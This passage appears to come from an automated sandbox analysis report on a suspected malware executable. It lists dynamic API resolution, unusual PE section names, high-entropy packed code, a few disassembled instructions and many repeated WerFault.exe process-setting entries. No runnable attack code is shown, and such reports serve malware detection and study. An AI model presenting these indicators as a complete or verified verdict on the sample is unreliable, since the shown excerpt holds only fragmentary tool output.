                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: ttFpxuMwKz.exeStatic PE information: section name: .tojo
                      Source: ttFpxuMwKz.exeStatic PE information: section name: .jedemeb
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007FB29C push ecx; ret 0_2_007FB2AF
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_007E0F56 pushfd ; iretd 0_2_007E1078
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_009EE5BA push eax; ret 0_2_009EE5C9
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_009EE5AB push eax; ret 0_2_009EE5C9
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_009EB5DB push 7DD07DC0h; iretd 0_2_009EB5EC
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_009EAAD5 pushfd ; iretd 0_2_009EAAD8
                      Source: ttFpxuMwKz.exeStatic PE information: section name: .text entropy: 7.873070673293666
                      Source: C:\Users\user\Desktop\ttFpxuMwKz.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
